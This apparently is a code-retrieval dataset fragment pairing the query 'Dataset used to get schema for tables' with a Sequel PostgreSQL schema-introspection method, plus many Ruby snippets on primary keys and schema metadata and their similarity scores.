"def pkey_selection(table = nil)\n prefix = table ? \"#{table}.\" : \"\"\n \"#{primary_key.map { |k| \"#{prefix}`#{k}` AS '#{k}'\" }.join(', ')}\"\n end",
"def primary_key?\n schema && schema[:primary_key]\n end",
"def full_primary_key(klass)\n \"#{klass.quoted_table_name}.#{klass.quoted_primary_key}\"\n end",
"def pk_and_sequence_for(table_name, owner = nil, desc_table_name = nil) # :nodoc:\n (owner, desc_table_name) = @raw_connection.describe(table_name)\n\n seqs = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"sequence_name\", default_sequence_name(desc_table_name))])\n select us.sequence_name\n from all_sequences us\n where us.sequence_owner = :owner\n and us.sequence_name = upper(:sequence_name)\n SQL\n\n # changed back from user_constraints to all_constraints for consistency\n pks = select_values_forcing_binds(<<~SQL.squish, \"SCHEMA\", [bind_string(\"owner\", owner), bind_string(\"table_name\", desc_table_name)])\n SELECT cc.column_name\n FROM all_constraints c, all_cons_columns cc\n WHERE c.owner = :owner\n AND c.table_name = :table_name\n AND c.constraint_type = 'P'\n AND cc.owner = c.owner\n AND cc.constraint_name = c.constraint_name\n SQL\n\n warn <<~WARNING if pks.count > 1\n WARNING: Active Record does not support composite primary key.\n\n #{table_name} has composite primary key. Composite primary key is ignored.\n WARNING\n\n # only support single column keys\n pks.size == 1 ? [oracle_downcase(pks.first),\n oracle_downcase(seqs.first)] : nil\n end",
"def primary_key\n @attributes[self.primary_key_attribute]\n end",
"def find_primary_key_by_table(table_name)\n @opts[:primary_key].values_at(table_name).first\n end",
"def pk\n raise(Error, \"No primary key is associated with this model\") unless key = primary_key\n case key\n when Array\n key.collect{|k| @values[k]}\n else\n @values[key]\n end\n end",
"def primary_key\n case primary_key_prefix_type\n when :table_name\n Inflector.foreign_key(class_name_of_active_record_descendant(self), false)\n when :table_name_with_underscore\n Inflector.foreign_key(class_name_of_active_record_descendant(self))\n else\n \"id\"\n end\n end",
"def table_id\n\n end",
"def pk_hash\n model.primary_key_hash(pk)\n end",
"def primary_key\n @primary_key ||= :id\n end",
"def primary_key(*attributes)\n if attributes.size == 1 and String===attributes[0]\n @relvar.set_primary_key(@relvar.candidate_key(attributes[0], true))\n else\n name = String===attributes[0] ? attributes.shift : \"pk_#{@relvar.name}\"\n attributes.unshift(name)\n @relvar.set_primary_key(candidate_key(*attributes))\n end\n end",
"def setup_columns\n if inheritable?\n SimpleSet.new([primary_key, inheritance_column])\n else\n primary_key.blank? ? SimpleSet.new : SimpleSet.new([primary_key])\n end \n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def primary_key\n @primary_key ||= @klass.primary_key.to_s\n end",
"def primary_key_attr?(a)\n data_class && a[:name].to_s == data_class.primary_key\n end",
"def primary_key_attr?(a)\n data_class && a[:name].to_s == data_class.primary_key\n end",
"def _primary_key_order\n if @opts[:order].nil? && model && (pk = model.primary_key)\n cached_dataset(:_pk_order_ds){order(*pk)}\n end\n end",
"def _primary_key_order\n if @opts[:order].nil? && model && (pk = model.primary_key)\n cached_dataset(:_pk_order_ds){order(*pk)}\n end\n end",
"def primary_key\n primary_key = attributes.find { |a| a.primary_key? }\n error(\"Unable to locate primary key for #{self.name}, attributes => #{attributes.collect { |a| a.name }}\") unless primary_key\n primary_key\n end",
"def ids\n primary_key_array = Array(primary_key)\n\n if loaded?\n result = records.map do |record|\n if primary_key_array.one?\n record._read_attribute(primary_key_array.first)\n else\n primary_key_array.map { |column| record._read_attribute(column) }\n end\n end\n return @async ? Promise::Complete.new(result) : result\n end\n\n if has_include?(primary_key)\n relation = apply_join_dependency.group(*primary_key_array)\n return relation.ids\n end\n\n columns = arel_columns(primary_key_array)\n relation = spawn\n relation.select_values = columns\n\n result = if relation.where_clause.contradiction?\n ActiveRecord::Result.empty\n else\n skip_query_cache_if_necessary do\n klass.connection.select_all(relation, \"#{klass.name} Ids\", async: @async)\n end\n end\n\n result.then { |result| type_cast_pluck_values(result, columns) }\n end",
"def pk_and_sequence_for(table) #:nodoc:\n # First try looking for a sequence with a dependency on the\n # given table's primary key.\n result = select(<<-end_sql, 'PK and serial sequence')[0]\n SELECT attr.attname, seq.relname\n FROM pg_class seq,\n pg_attribute attr,\n pg_depend dep,\n pg_namespace name,\n pg_constraint cons\n WHERE seq.oid = dep.objid\n AND seq.relkind = 'S'\n AND attr.attrelid = dep.refobjid\n AND attr.attnum = dep.refobjsubid\n AND attr.attrelid = cons.conrelid\n AND attr.attnum = cons.conkey[1]\n AND cons.contype = 'p'\n AND dep.refobjid = '#{quote_table_name(table)}'::regclass\n end_sql\n\n if result.nil? or result.empty?\n # If that fails, try parsing the primary key's default value.\n # Support the 7.x and 8.0 nextval('foo'::text) as well as\n # the 8.1+ nextval('foo'::regclass).\n result = select(<<-end_sql, 'PK and custom sequence')[0]\n SELECT attr.attname,\n CASE\n WHEN split_part(def.adsrc, '''', 2) ~ '.' THEN\n substr(split_part(def.adsrc, '''', 2),\n strpos(split_part(def.adsrc, '''', 2), '.')+1)\n ELSE split_part(def.adsrc, '''', 2)\n END as relname\n FROM pg_class t\n JOIN pg_attribute attr ON (t.oid = attrelid)\n JOIN pg_attrdef def ON (adrelid = attrelid AND adnum = attnum)\n JOIN pg_constraint cons ON (conrelid = adrelid AND adnum = conkey[1])\n WHERE t.oid = '#{quote_table_name(table)}'::regclass\n AND cons.contype = 'p'\n AND def.adsrc ~* 'nextval'\n end_sql\n end\n\n [result[\"attname\"], result[\"relname\"]]\n rescue\n nil\n end",
"def keys!\n @table.keys\n end",
"def master_pk(h)\n x = @master_primary_keys\n if x.is_a?(Array)\n unless x == []\n x = x.map{|ca| h[ca]}\n x if x.all?\n end\n else\n h[x]\n end\n end",
"def key(*fields)\n self.primary_key = fields\n identity(:type => String)\n set_callback :save, :before, :identify\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def set_primary_key(key)\n clear_setter_methods_cache\n if key.is_a?(Array)\n if key.length < 2\n key = key.first\n else\n key = key.dup.freeze\n end\n end\n self.simple_pk = if key && !key.is_a?(Array)\n (@dataset || db).literal(key).freeze\n end\n @primary_key = key\n end",
"def scaffold_primary_key\n get_key_array_safe(key).name\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def primary_key\n self.class.primary_key\n end",
"def get_keys\n table_cond = @files ? \"AND r.relname IN (#{@files.map{|(t,f)|\"'#{t}'\"}.join(', ')})\" : ''\n results = query(<<-SQL)\n SELECT\n r.relname,\n c.conname,\n c.contype,\n pg_get_constraintdef(c.oid)\n FROM\n pg_class r,\n pg_constraint c\n WHERE\n c.conrelid = r.oid\n AND c.contype IN ('f', 'p')\n AND r.relkind = 'r'\n AND r.relnamespace = (SELECT oid FROM pg_namespace WHERE nspname = '#{@config[:schema]}')\n #{table_cond}\n SQL\n\n hash = {}\n results.map do |row|\n table, key, type, create_sql = row.split(/\\t/)\n hash[key] = {:table => table, :type => type == 'p' ? :primary_key : :foreign_key, :create_sql => create_sql}\n end\n hash\n end",
"def scaf_serial_columns\n scaf_columns.select { |c| c.primary }\n end",
"def orchestrate_primary_key\n id\n end",
"def allowed_keys\n field_names - [id_column]\n end"
] |
[
"0.77333367",
"0.7475051",
"0.7425205",
"0.7375289",
"0.7366104",
"0.72455585",
"0.7180687",
"0.7167466",
"0.7092792",
"0.70765555",
"0.706616",
"0.7043821",
"0.69874865",
"0.68165034",
"0.68044215",
"0.6772434",
"0.67652905",
"0.675731",
"0.67554665",
"0.6754021",
"0.6702185",
"0.6678628",
"0.6675176",
"0.66672254",
"0.6649987",
"0.6623577",
"0.6612956",
"0.65735036",
"0.6524573",
"0.6482793",
"0.6479449",
"0.6470976",
"0.6470976",
"0.64658296",
"0.6448546",
"0.64319026",
"0.6402581",
"0.6394426",
"0.638231",
"0.6379609",
"0.63760495",
"0.63543034",
"0.6331958",
"0.6315892",
"0.6274839",
"0.6272989",
"0.62656116",
"0.62519264",
"0.62337005",
"0.62328106",
"0.6213058",
"0.62014216",
"0.61891216",
"0.61837035",
"0.61793065",
"0.6176419",
"0.6162146",
"0.6160452",
"0.6152628",
"0.6152245",
"0.6141882",
"0.6137353",
"0.6119391",
"0.60881376",
"0.60844696",
"0.60835916",
"0.6075179",
"0.6073133",
"0.60728455",
"0.6060063",
"0.60545015",
"0.6053264",
"0.6052968",
"0.603363",
"0.6025873",
"0.6007904",
"0.59937006",
"0.5984959",
"0.5979275",
"0.5964162",
"0.5948063",
"0.5948063",
"0.5940324",
"0.5940324",
"0.59391075",
"0.5926405",
"0.5920673",
"0.59188396",
"0.5915631",
"0.59143543",
"0.5888498",
"0.5888498",
"0.58864224",
"0.5876702",
"0.5876702",
"0.5876702",
"0.5868904",
"0.5867012",
"0.5860776",
"0.5859786"
] |
0.75759834
|
1
|
Dataset used to get schema for tables
|
def _schema_ds
  @_schema_ds ||= begin
    ds = metadata_dataset.select{[
        pg_attribute[:attname].as(:name),
        SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),
        SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),
        SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),
        SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),
        SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),
        SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),
        SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),
        Sequel[:pg_type][:typtype],
        (~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),
      ]}.
      from(:pg_class).
      join(:pg_attribute, :attrelid=>:oid).
      join(:pg_type, :oid=>:atttypid).
      left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).
      left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).
      left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).
      left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).
      where{{pg_attribute[:attisdropped]=>false}}.
      where{pg_attribute[:attnum] > 0}.
      order{pg_attribute[:attnum]}

    # :nocov:
    if server_version > 100000
    # :nocov:
      # PostgreSQL 10+ exposes identity columns via pg_attribute.attidentity
      ds = ds.select_append{pg_attribute[:attidentity]}

      # :nocov:
      if server_version > 120000
      # :nocov:
        # PostgreSQL 12+ exposes generated columns via pg_attribute.attgenerated
        ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}
      end
    end
    ds
  end
end
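
# A hedged usage sketch (variable names here are illustrative): the
# adapter-level consumer filters this dataset to a single table's pg_class
# OID and turns each row into a `[column_name, info_hash]` schema pair;
# compare the `schema_parse_table` implementation among the negatives below,
# which does exactly that via `where_all`.
#
#   rows = _schema_ds.where_all(Sequel[:pg_class][:oid] => regclass_oid(table_name, opts))
#   rows.map { |row| [m.call(row.delete(:name)), row] }  # m converts identifiers for output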
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def schema_and_table(table_name)\n schema_utility_dataset.schema_and_table(table_name)\n end",
"def schema_ds_from(table_name, opts)\n [:information_schema__tables___t]\n end",
"def tables(opts={})\n m = output_identifier_meth\n metadata_dataset.from(:information_schema__tables___t).\n select(:table_name).\n filter(:table_type=>'BASE TABLE', :table_schema=>(opts[:schema]||default_schema||'dbo').to_s).\n map{|x| m.call(x[:table_name])}\n end",
"def schema_ds(table_name, opts)\n schema_ds_dataset.from(*schema_ds_from(table_name, opts)) \\\n .select(*schema_ds_select(table_name, opts)) \\\n .join(*schema_ds_join(table_name, opts)) \\\n .filter(*schema_ds_filter(table_name, opts))\n end",
"def schema\n jiak.data.schema\n end",
"def schema\n adapter.schema\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def dataset\n database[table_name]\n end",
"def schema_parse_table(table, opts={})\n ds = dataset\n ds.identifier_output_method = :downcase\n schema_and_table = \"#{\"#{quote_identifier(opts[:schema])}.\" if opts[:schema]}#{quote_identifier(table)}\"\n table_schema = []\n metadata = transaction(opts){|conn| conn.describe_table(schema_and_table)}\n metadata.columns.each do |column|\n table_schema << [\n column.name.downcase.to_sym,\n {\n :type => column.data_type,\n :db_type => column.type_string.split(' ')[0],\n :type_string => column.type_string,\n :charset_form => column.charset_form,\n :char_used => column.char_used?,\n :char_size => column.char_size,\n :data_size => column.data_size,\n :precision => column.precision,\n :scale => column.scale,\n :fsprecision => column.fsprecision,\n :lfprecision => column.lfprecision,\n :allow_null => column.nullable?\n }\n ]\n end\n table_schema.instance_variable_set :@features, {\n :owner => :\"#{metadata.obj_schema.downcase}\",\n :clustered => (metadata.clustered? rescue nil),\n :temporary => (metadata.is_temporary? rescue nil),\n :partitioning => (metadata.partitioned? rescue nil),\n :typed => (metadata.is_typed? rescue nil),\n :index_only => (metadata.index_only? rescue nil)\n }\n table_schema\n end",
"def schema_utility_dataset\n @default_dataset\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n _schema_ds.where_all(Sequel[:pg_class][:oid]=>regclass_oid(table_name, opts)).map do |row|\n row[:default] = nil if blank_object?(row[:default])\n if row[:base_oid]\n row[:domain_oid] = row[:oid]\n row[:oid] = row.delete(:base_oid)\n row[:db_domain_type] = row[:db_type]\n row[:db_type] = row.delete(:db_base_type)\n else\n row.delete(:base_oid)\n row.delete(:db_base_type)\n end\n\n db_type = row[:db_type]\n row[:type] = if row.delete(:is_array)\n schema_array_type(db_type)\n else\n send(TYPTYPE_METHOD_MAP[row.delete(:typtype)], db_type)\n end\n identity = row.delete(:attidentity)\n if row[:primary_key]\n row[:auto_increment] = !!(row[:default] =~ /\\A(?:nextval)/i) || identity == 'a' || identity == 'd'\n end\n\n # :nocov:\n if server_version >= 90600\n # :nocov:\n case row[:oid]\n when 1082\n row[:min_value] = MIN_DATE\n row[:max_value] = MAX_DATE\n when 1184, 1114\n if Sequel.datetime_class == Time\n row[:min_value] = MIN_TIMESTAMP\n row[:max_value] = MAX_TIMESTAMP\n end\n end\n end\n\n [m.call(row.delete(:name)), row]\n end\n end",
"def get_tables\n get_schemas.keys\n end",
"def schema\n raise NotImplementedError\n end",
"def schema\n @schema ||= (default_schema || ETL::Schema::Table.new)\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema_utility_dataset\n @schema_utility_dataset ||= dataset\n end",
"def schema\n schema = Schema.new\n\n for name in db.tables\n next if IGNORED_TABLES.include? name\n table = schema.add_table( name )\n import_table( table )\n end\n\n schema\n end",
"def schema_meta_data\n schema = []\n # not sure if there needs to be a header element with the number of columns in it\n # would look sort of like this\n # header = SchemaElement.new\n # header.name = @csv.rows.first.first\n # header.num_children = num_rows\n # schema << header\n @csv.headers.each do |header|\n schema << Configurator.schema_element_with_defaults({\n name: header\n })\n end\n\n schema\n end",
"def schema(table, opts={})\n hero = execute(\"DESCRIBE #{table}\")\n hero.map do |h|\n [\n h[:col_name].strip.to_sym,\n { :db_type => h[:data_type].strip , :comment => h[:comment].strip }\n ]\n end\n end",
"def chooseSchema\n @metadata.chooseSchema\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth\n m2 = input_identifier_meth\n ds = metadata_dataset.from(:information_schema__tables___t).\n join(:information_schema__columns___c, :table_catalog=>:table_catalog,\n :table_schema => :table_schema, :table_name => :table_name).\n select(:column_name___column, :data_type___db_type, :character_maximum_length___max_chars, :column_default___default, :is_nullable___allow_null).\n filter(:c__table_name=>m2.call(table_name.to_s))\n if schema = opts[:schema] || default_schema\n ds.filter!(:table_schema=>schema)\n end\n ds.map do |row|\n row[:allow_null] = row[:allow_null] == 'YES' ? true : false\n row[:default] = nil if blank_object?(row[:default])\n row[:type] = schema_column_type(row[:db_type])\n [m.call(row.delete(:column)), row]\n end\n end",
"def table_name\n if qualified? && meta[:qualified].is_a?(Symbol)\n meta[:qualified]\n else\n source.dataset\n end\n end",
"def schema(table, opts={})\n hero = execute(\"DESCRIBE #{table}\")\n hero.map do |h|\n [ h[:col_name].to_sym, { :db_type => h[:data_type] , :comment => h[:comment] } ]\n end\n end",
"def schema_and_table(result)\n :\"#{result.schema}__#{self.implicit_table_name}\"\n end",
"def schema\n self.class.schema\n end",
"def schema_tables\n @schema_tables ||= %i[\n projects\n amazon_clouds\n data_centers\n jmeter_plans\n load_agents\n target_hosts\n clusters\n execution_cycles\n client_stats\n page_stats\n target_stats\n jtl_files\n ]\n end",
"def load_table_schema(conn, builder, table)\n builder.relvar(table){\n primary_key_columns = load_table_heading(conn, builder, table)\n load_table_constraints(conn, builder, table, primary_key_columns)\n }\n end",
"def schema\n []\n end",
"def schema_parse_table(table_name, opts)\n m = output_identifier_meth(opts[:dataset])\n\n table = if opts[:schema]\n Sequel.qualify(opts[:schema], table_name)\n else\n Sequel.identifier(table_name)\n end\n\n describe(table, opts).map do |row|\n row[:db_type] = row[:type]\n row[:type] = schema_column_type(row[:db_type])\n row[:default] = nil\n row[:primary_key] = false\n [m.call(row.delete(:name)), row]\n end\n end",
"def table_schema(tbl)\n column_sql = <<-eosql\nSELECT rf.rdb$field_name AS \"name\",\n field.rdb$field_type AS \"type_code\",\n field.rdb$field_sub_type AS \"subtype_code\",\n-- -- -- field.rdb$field_length AS \"length\", -- -- --\n field.rdb$field_precision AS \"precision\",\n field.rdb$field_scale AS \"scale\",\n CASE\n WHEN rf.rdb$null_flag > 0\n THEN 'NO'\n ELSE 'YES'\n END AS \"nullable\",\n CASE\n WHEN iseg.rdb$index_name IS NOT NULL\n THEN 'YES'\n ELSE 'NO'\n END AS \"primary_key\"\nFROM rdb$relation_fields rf\nJOIN rdb$fields field ON rf.rdb$field_source = field.rdb$field_name\nLEFT JOIN rdb$relation_constraints c\n ON c.rdb$relation_name = rf.rdb$relation_name\n AND\n c.rdb$constraint_type = 'PRIMARY KEY'\nLEFT JOIN rdb$index_segments iseg\n ON iseg.rdb$index_name = c.rdb$index_name\n AND\n iseg.rdb$field_name = rf.rdb$field_name\nWHERE rf.rdb$relation_name = ?\nORDER BY rf.rdb$field_position, rf.rdb$field_name\neosql\n\n info = RDBI::Schema.new([], [])\n res = execute(column_sql, tbl.to_s.upcase)\n res.as(:Struct)\n while row = res.fetch[0]\n type = RDBI::Driver::Rubyfb::Types::field_type_to_rubyfb(row[:type_code], row[:subtype_code])\n info.columns << RDBI::Column.new(\n row[:name].to_sym,\n type,\n RDBI::Driver::Rubyfb::Types::rubyfb_to_rdbi(type, row[:scale]),\n row[:precision],\n row[:scale],\n row[:nullable] == 'YES',\n #nil, # metadata\n #nil, # default\n #nil, # table\n )\n (info.columns[-1].primary_key = row[:primary_key] == 'YES') rescue nil # pk > rdbi 0.9.1\n end\n return unless info.columns.length > 0\n info.tables << tbl\n info\n end",
"def table_structure(table_name)\n execute('select * from information_schema.columns where table_schema = ?' \\\n 'AND table_name = ?', [schema, table_name])\n end",
"def get_dataset(table)\n #puts \"converting to a dataset\"\n to_dataset(@datafiles[table].content)\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def schema(obj)\n y(obj.send(\"column_names\"))\nend",
"def list_tables\n data.keys\n end",
"def schema\n connection.schema\n end",
"def __create_meta_data_table_for schema\n ActiveRecord::Base.establish_connection(self.connection_data) unless schema.connected?\n\n # Clears the table cache for the schema (remove TableDoesNotExists if a table actually exists)\n schema.clear_cache!\n\n unless schema.table_exists?\n ActiveRecord::Schema.define do\n create_table schema.table_name do |t|\n t.column :version, :float\n end\n end\n end\n end",
"def get_db_schema(reload = reload_db_schema?)\n set_columns(nil)\n return nil unless @dataset\n schema_hash = {}\n ds_opts = dataset.opts\n get_columns = proc{check_non_connection_error{columns} || []}\n schema_array = check_non_connection_error(false){db.schema(dataset, :reload=>reload)} if db.supports_schema_parsing?\n if schema_array\n schema_array.each{|k,v| schema_hash[k] = v}\n\n # Set the primary key(s) based on the schema information,\n # if the schema information includes primary key information\n if schema_array.all?{|k,v| v.has_key?(:primary_key)}\n pks = schema_array.map{|k,v| k if v[:primary_key]}.compact\n pks.length > 0 ? set_primary_key(pks) : no_primary_key\n end\n\n if (select = ds_opts[:select]) && !(select.length == 1 && select.first.is_a?(SQL::ColumnAll))\n # We don't remove the columns from the schema_hash,\n # as it's possible they will be used for typecasting\n # even if they are not selected.\n cols = get_columns.call\n cols.each{|c| schema_hash[c] ||= {}}\n def_column_accessor(*schema_hash.keys)\n else\n # Dataset is for a single table with all columns,\n # so set the columns based on the order they were\n # returned by the schema.\n cols = schema_array.map{|k,v| k}\n set_columns(cols)\n # Also set the columns for the dataset, so the dataset\n # doesn't have to do a query to get them.\n dataset.send(:columns=, cols)\n end\n else\n # If the dataset uses multiple tables or custom sql or getting\n # the schema raised an error, just get the columns and\n # create an empty schema hash for it.\n get_columns.call.each{|c| schema_hash[c] = {}}\n end\n schema_hash\n end",
"def get_db_schema(reload = reload_db_schema?)\n set_columns(nil)\n return nil unless @dataset\n schema_hash = {}\n ds_opts = dataset.opts\n get_columns = proc{check_non_connection_error{columns} || []}\n schema_array = check_non_connection_error(false){db.schema(dataset, :reload=>reload)} if db.supports_schema_parsing?\n if schema_array\n schema_array.each{|k,v| schema_hash[k] = v}\n\n # Set the primary key(s) based on the schema information,\n # if the schema information includes primary key information\n if schema_array.all?{|k,v| v.has_key?(:primary_key)}\n pks = schema_array.map{|k,v| k if v[:primary_key]}.compact\n pks.length > 0 ? set_primary_key(pks) : no_primary_key\n end\n\n if (select = ds_opts[:select]) && !(select.length == 1 && select.first.is_a?(SQL::ColumnAll))\n # We don't remove the columns from the schema_hash,\n # as it's possible they will be used for typecasting\n # even if they are not selected.\n cols = get_columns.call\n cols.each{|c| schema_hash[c] ||= {}}\n def_column_accessor(*schema_hash.keys)\n else\n # Dataset is for a single table with all columns,\n # so set the columns based on the order they were\n # returned by the schema.\n cols = schema_array.map{|k,v| k}\n set_columns(cols)\n # Also set the columns for the dataset, so the dataset\n # doesn't have to do a query to get them.\n dataset.send(:columns=, cols)\n end\n else\n # If the dataset uses multiple tables or custom sql or getting\n # the schema raised an error, just get the columns and\n # create an empty schema hash for it.\n get_columns.call.each{|c| schema_hash[c] = {}}\n end\n schema_hash\n end",
"def schema\n @schema ||= metadata.ancestors('Schema').first\n end",
"def schema\n @schema ||= []\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def tables\n []\n end",
"def tables\n [\n ]\n end",
"def tables\n sanity_check\n @handle.tables\n end",
"def schema_definition\n of.schema_definition \n end",
"def schema_parse_tables(opts)\n schemas = {}\n schema_ds(nil, opts).each do |row|\n (schemas[row.delete(:table_name).to_sym] ||= []) << row\n end\n schemas.each do |table, rows|\n schemas[table] = schema_parse_rows(rows)\n end\n schemas\n end",
"def dataset\n @dataset ||= begin\n create_table!\n database[:data_stores]\n end\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def table_structure(table_name)\r\n sql = \"SELECT COLUMN_NAME, IIF(COLUMN_DEF = 'NULL', null, COLUMN_DEF) as COLUMN_DEF, TYPE_NAME, NULLABLE from (EXECUTE PROCEDURE sp_GetColumns( NULL, NULL, '#{table_name}', NULL )) spgc where table_cat <> 'system';\"\r\n structure = execute(sql, :skip_logging)\r\n raise(ActiveRecord::StatementInvalid, \"Could not find table '#{table_name}'\") if structure == false\r\n structure\r\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def get_tables\n tables\n end",
"def schema\n self\n end",
"def schema_data\n dev_schema\n rescue\n VetsJsonSchema::SCHEMAS[@schema_name]\n end",
"def schema(path = nil)\n s = \"ActiveRecord::Schema.define do\\n\"\n s << \" create_table \\\"#{File.basename(@data.path, \".*\")}\\\" do |t|\\n\"\n columns.each do |column|\n s << \" t.column #{column.schema_definition}\"\n end\n s << \" end\\nend\"\n \n if path\n File.open(path, 'w') {|f| f.puts(s)}\n end\n \n s\n end",
"def tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema]).map(&:first)\n end",
"def data\r\n tables_ret = []\r\n tables.list.each do |name, table|\r\n tables_ret << table.data\r\n end\r\n \r\n return {\r\n \"tables\" => tables_ret\r\n }\r\n end",
"def schema\n return @schema\n end",
